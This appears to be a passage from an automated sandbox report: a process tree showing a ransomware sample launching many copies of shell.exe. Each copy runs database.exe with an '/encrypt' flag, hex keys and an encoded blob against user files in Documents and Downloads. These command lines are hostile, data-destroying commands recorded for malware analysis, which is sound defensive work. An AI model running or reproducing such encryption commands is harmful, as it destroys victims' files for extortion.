                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\Bv4uLoER-EylLZw2W.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\CompareSync.csv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ConfirmApprove.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ConfirmSave.txt.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\CopyUnregister.csv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-BFZAWQBHFFNLEXJPRTDKOFVKBPOOAO.SJV.cbf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\[email protected] 1.2.0.0.id-PWMKXUEAKWFERZZJIPDAFYRRCQTEJNYWNZUY-11@7@2024 4@47@48 PM5858394.randomname-LCAMHADDGXYNDDTSOPLRHLKFDCRQGH.HCB.cbf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UlIOoJla-v5ZPQHqO.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UnblockCopy.pps.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UnregisterUpdate.xla.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\WriteResume.vsw.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ApproveLimit.ini.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\BackupUpdate.vst.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\GetDisable.cab.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\InitializeShow.m4v.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
